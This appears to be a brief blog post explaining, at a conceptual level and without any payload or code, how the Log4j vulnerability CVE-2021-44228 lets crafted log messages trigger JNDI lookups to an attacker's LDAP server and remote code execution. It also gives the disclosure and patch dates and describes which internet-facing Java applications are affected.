How attackers use log4j vulnerability(CVE-2021–44228)to access applications and how to quickly patch it in production/pilot systems

A vulnerability( CVE-2021–44228) in Apache Log4j, a widely used logging package for Java has been found( first reported to Apache on November 24 2021 and was patched with version 2.15.0 of Log4j on December 9 2021

To know more about logging frameworks/wrappers in java refer What is the difference between SLF4j and log4J/log4j2?(Logging frameworks vs Logging wrappers in java) | by Aditya | Medium

How it works → This vulnerability allows attackers to execute arbitrary code by sending crafted log messages (in User-Agent string, referrer, username) to internet-facing applications that use log4j.

Once those messages are logged, the vulnerability will be trigger JNDI to query the threat actor-controlled LDAP server which responds with information that includes a remote Java class file , that can be executed.

Some of the initial investigations suggest those remote files install crypto mining bots on compromised systems.

Which components impacted → Any public facing applications that will be invoked using api’s, that use log4j library for logging will be impacted as this bug allows to submit crafted messages in api requests (in User Agent string, referrer, username) to invoke the remote execution capabilities.